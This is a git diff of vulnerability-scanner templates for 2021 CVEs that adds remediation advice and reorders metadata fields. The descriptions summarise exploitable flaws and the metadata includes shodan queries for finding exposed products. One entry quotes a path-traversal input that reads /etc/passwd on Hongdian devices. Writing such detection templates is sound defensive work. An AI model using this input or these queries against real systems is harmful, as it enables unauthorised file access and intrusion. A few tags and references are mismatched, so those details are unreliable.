a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index e54420d87f..426988e263 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks. + remediation: | + Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/49943 - https://github.com/fudforum/FUDforum/issues/2 @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-27520 cwe-id: CWE-79 epss-score: 0.00189 - cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* epss-percentile: 0.55657 + cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: html:"FUDforum" verified: true + max-request: 2 vendor: fudforum product: fudforum + shodan-query: html:"FUDforum" tags: packetstorm,cve,cve2021,xss,fuddorum,edb,intrusive http: diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 27e9c5934c..12598f1e72 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -5,6 +5,8 @@ info: author: shifacyclewala,hackergautam severity: critical description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication. + remediation: | + Update to the latest firmware version provided by the vendor to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-27561 cwe-id: CWE-78 epss-score: 0.97493 - cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:* epss-percentile: 0.99958 + cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: yealink diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index 8d306bcf1b..1e217d1a6c 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -5,6 +5,8 @@ info: author: idealphase,daffainfo severity: critical description: Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks. + remediation: | + Apply the necessary security patches or updates provided by Pega Infinity to mitigate the authentication bypass vulnerability (CVE-2021-27651). reference: - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-27651 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-27651 cwe-id: CWE-287 epss-score: 0.03154 - cpe: cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:* epss-percentile: 0.89839 + cpe: cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: pega diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index 1ef2410224..e32163c677 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: critical description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter. + remediation: | + Upgrade to a patched version of Appspace 6.2.4 or apply the necessary security patches provided by the vendor. reference: - https://github.com/h3110mb/PoCSSrfApp - https://nvd.nist.gov/vuln/detail/CVE-2021-27670 @@ -14,14 +16,14 @@ info: cve-id: CVE-2021-27670 cwe-id: CWE-918 epss-score: 0.32169 - cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:* epss-percentile: 0.96438 + cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"Appspace" + max-request: 1 vendor: appspace product: appspace + shodan-query: title:"Appspace" tags: cve,cve2023,appspace,ssrf http: diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml index 8890bb10b6..055b63b576 100644 --- a/http/cves/2021/CVE-2021-27748.yaml +++ b/http/cves/2021/CVE-2021-27748.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers. + remediation: | + Apply the latest security patches or updates provided by IBM to mitigate this vulnerability. reference: - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 @@ -13,8 +15,8 @@ info: classification: cve-id: CVE-2021-27748 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"IBM WebSphere Portal" tags: cve,cve2021,hcl,ibm,ssrf,websphere diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index e0da3906cf..e917fc45fe 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. + remediation: | + Apply the latest security patches or updates provided by Apache to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-27850 - https://lists.apache.org/thread.html/r237ff7f286bda31682c254550c1ebf92b0ec61329b32fbeb2d1c8751%40%3Cusers.tapestry.apache.org%3E @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-27850 cwe-id: CWE-502,CWE-200 epss-score: 0.97402 - cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:* epss-percentile: 0.99878 + cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index 64d696797a..0db18cbab7 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -5,21 +5,21 @@ info: author: hackergautam severity: critical description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. + remediation: This issue is resolved in Apache Solr 8.8.2 and later. reference: - https://www.anquanke.com/post/id/238201 - https://ubuntu.com/security/CVE-2021-27905 - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - https://lists.apache.org/thread.html/r0ddc3a82bd7523b1453cb7a5e09eb5559517145425074a42eb326b10%40%3Cannounce.apache.org%3E - remediation: This issue is resolved in Apache Solr 8.8.2 and later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27905 cwe-id: CWE-918 epss-score: 0.9728 - cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* epss-percentile: 0.99779 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 8a924d825a..6a9ade1838 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -5,6 +5,8 @@ info: author: kiransau severity: medium description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks. + remediation: | + Upgrade Mautic to version 3.3.4 or later to mitigate this vulnerability. reference: - https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc - https://nvd.nist.gov/vuln/detail/CVE-2021-27909 @@ -14,14 +16,14 @@ info: cve-id: CVE-2021-27909 cwe-id: CWE-79 epss-score: 0.00094 - cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* epss-percentile: 0.38928 + cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Mautic" verified: true + max-request: 1 vendor: acquia product: mautic + shodan-query: title:"Mautic" tags: cve,cve2021,mautic,xss http: diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index ece4b06420..28d5a548cf 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: critical description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service. + remediation: | + Upgrade LumisXP to version 10.0.0 or above to mitigate the vulnerability. reference: - https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt - https://nvd.nist.gov/vuln/detail/CVE-2021-27931 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-27931 cwe-id: CWE-611 epss-score: 0.68126 - cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:* epss-percentile: 0.9753 + cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lumis diff --git a/http/cves/2021/CVE-2021-28073.yaml b/http/cves/2021/CVE-2021-28073.yaml index e932efbbcd..e67ff20802 100644 --- a/http/cves/2021/CVE-2021-28073.yaml +++ b/http/cves/2021/CVE-2021-28073.yaml @@ -5,11 +5,11 @@ info: author: z3bd severity: critical description: Ntopng, a passive network monitoring tool, contains an authentication bypass vulnerability in ntopng <= 4.2 + remediation: Upgrade to version 4.3 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-27573 - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/ - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md - remediation: Upgrade to version 4.3 or later. classification: cve-id: CVE-2021-28073 metadata: diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index cd6585893c..3f068794ef 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Hongdian H8922 3.0.5 Devices. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-28149 cwe-id: CWE-22 epss-score: 0.06892 - cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* epss-percentile: 0.93035 + cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hongdian diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index 471cad4428..460ebad7ed 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150). reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-28150 cwe-id: CWE-425 epss-score: 0.00339 - cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* epss-percentile: 0.67725 + cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hongdian diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index 5329180d03..9d42e5213f 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Hongdian H8922 3.0.5 devices are susceptible to remote command injection via shell metacharacters into the ip-address (a/k/a Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system. + remediation: | + Apply the latest security patch or update to a non-vulnerable version of the Hongdian H8922 firmware. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-28151 cwe-id: CWE-78 epss-score: 0.97079 - cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* epss-percentile: 0.99662 + cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hongdian diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index 536c5026ac..802b0581a2 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224 is susceptible to improper authorization. The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. An attacker can access sensitive information regarding the implementation of a web application. + remediation: | + Apply the latest security patches or updates provided by the Eclipse Jetty project to fix the information disclosure vulnerability. reference: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-28164 cwe-id: CWE-200 epss-score: 0.02064 - cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:* epss-percentile: 0.87606 + cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:* metadata: max-request: 1 vendor: eclipse diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index fcded57edf..79e008577d 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Eclipse Jetty through 9.4.40, through 10.0.2, and through 11.0.2 is susceptible to information disclosure. Requests to the ConcatServlet with a doubly encoded path can access protected resources within the WEB-INF directory, thus enabling an attacker to potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to Eclipse Jetty version 9.4.40 or later to mitigate this vulnerability. reference: - https://twitter.com/sec715/status/1406787963569065988 - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-28169 cwe-id: CWE-200 epss-score: 0.00116 - cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* epss-percentile: 0.44634 + cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: eclipse diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 01003f16c7..4c090d416e 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials. + remediation: | + Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability. reference: - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-28377 cwe-id: CWE-22 epss-score: 0.00158 - cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* epss-percentile: 0.51652 + cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* metadata: max-request: 1 - framework: joomla vendor: chronoengine product: chronoforums + framework: joomla tags: cve,cve2021,chronoforums,lfi,joomla http: diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index da36124cd0..8679d0e00b 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to a patched version of SEO Panel or apply the necessary security patches. reference: - https://github.com/seopanel/Seo-Panel/issues/209 - https://www.seopanel.org/spdownload/4.8.0 @@ -17,11 +19,11 @@ info: cve-id: CVE-2021-28419 cwe-id: CWE-89 epss-score: 0.17236 - cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* epss-percentile: 0.9541 + cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: seopanel product: seo_panel tags: cve,cve2021,sqli,seopanel,auth,packetstorm diff --git a/http/cves/2021/CVE-2021-28854.yaml b/http/cves/2021/CVE-2021-28854.yaml index 81eb44895a..af172ac5ad 100644 --- a/http/cves/2021/CVE-2021-28854.yaml +++ b/http/cves/2021/CVE-2021-28854.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. + remediation: | + Apply the latest security patches and updates provided by VICIdial to fix the vulnerability and ensure sensitive information is properly protected. reference: - https://github.com/JHHAX/VICIdial classification: diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml index 51eadd2fad..a25902df3e 100644 --- a/http/cves/2021/CVE-2021-28918.yaml +++ b/http/cves/2021/CVE-2021-28918.yaml @@ -5,6 +5,8 @@ info: author: johnjhacking severity: critical description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + remediation: | + Upgrade to Netmask version 2.0.0 or later, which includes a fix for this vulnerability. reference: - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://github.com/advisories/GHSA-pch5-whg9-qr2r @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-28918 cwe-id: CWE-704 epss-score: 0.02788 - cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:* epss-percentile: 0.89291 + cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:* metadata: max-request: 3 - framework: node.js vendor: netmask_project product: netmask + framework: node.js tags: cve,cve2021,npm,netmask,ssrf,lfi http: diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index e5fca40e4d..1c7939eb7d 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext. + remediation: | + Update the firmware to the latest version or replace the vulnerable repeater with a secure alternative. reference: - https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 - http://acexy.com @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-28937 cwe-id: CWE-312 epss-score: 0.03352 - cpe: cpe:2.3:o:acexy:wireless-n_wifi_repeater_firmware:28.08.06.1:*:*:*:*:*:*:* epss-percentile: 0.90136 + cpe: cpe:2.3:o:acexy:wireless-n_wifi_repeater_firmware:28.08.06.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: acexy diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index d4751526b9..d7b3bc6058 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -5,24 +5,24 @@ info: author: melbadry9,xelkomy severity: high description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval. + remediation: Upgrade to OpenAM commercial version 13.5.1 or later. reference: - https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md https://hackerone.com/reports/1278050 https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/ https://portswigger.net/research/hidden-oauth-attack-vectors - https://portswigger.net/research/hidden-oauth-attack-vectors - https://bugster.forgerock.org/jira/browse/OPENAM-10135 - remediation: Upgrade to OpenAM commercial version 13.5.1 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-29156 cwe-id: CWE-74 epss-score: 0.42881 - cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:* epss-percentile: 0.96852 + cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:* metadata: max-request: 3 - shodan-query: http.title:"OpenAM" vendor: forgerock product: openam + shodan-query: http.title:"OpenAM" tags: cve,cve2021,openam,ldap,injection http: diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 43e4d8f329..0fb241a132 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. + remediation: | + Upgrade to HPE Edgeline Infrastructure Manager version 1.22 or later to mitigate this vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-15 - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-29203 cwe-id: CWE-306 epss-score: 0.95703 - cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:* epss-percentile: 0.99168 + cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hp diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index 45a9886f0b..35f536ad0b 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -12,6 +12,8 @@ info: enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server. + remediation: | + Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29441). reference: - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ - https://github.com/alibaba/nacos/issues/4701 @@ -23,8 +25,8 @@ info: cve-id: CVE-2021-29441 cwe-id: CWE-290 epss-score: 0.96644 - cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* epss-percentile: 0.9947 + cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: alibaba diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index 356fccffdb..daae5bdf0e 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql). + remediation: | + Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29442). reference: - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ - https://github.com/alibaba/nacos/issues/4463 @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-29442 cwe-id: CWE-306 epss-score: 0.96994 - cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* epss-percentile: 0.99621 + cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: alibaba diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 3b607c24b7..ca9ec3869e 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -5,25 +5,25 @@ info: author: rootxharsh,iamnoooob severity: medium description: Ghost CMS 4.0.0 to 4.3.2 contains a DOM cross-site scripting vulnerability. An unused endpoint added during the development of 4.0.0 allows attackers to gain access by getting logged-in users to click a link containing malicious code. + remediation: This issue has been fixed in 4.3.3. reference: - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg - https://www.npmjs.com/package/ghost - https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290 - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 - remediation: This issue has been fixed in 4.3.3. classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N cvss-score: 6.8 cve-id: CVE-2021-29484 cwe-id: CWE-79 epss-score: 0.01083 - cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* epss-percentile: 0.82494 + cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: max-request: 1 - framework: node.js vendor: ghost product: ghost + framework: node.js tags: cve,cve2021,xss,ghost http: diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index 2e915c7c1c..bba755cc71 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter. + remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote". reference: - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96 - https://nvd.nist.gov/vuln/detail/CVE-2021-29490 - remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote". classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cve-id: CVE-2021-29490 cwe-id: CWE-918 epss-score: 0.00137 - cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* epss-percentile: 0.48378 + cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: http.title:"Jellyfin" + max-request: 2 vendor: jellyfin product: jellyfin + shodan-query: http.title:"Jellyfin" tags: cve,cve2021,ssrf,jellyfin,oast http: diff --git a/http/cves/2021/CVE-2021-29505.yaml 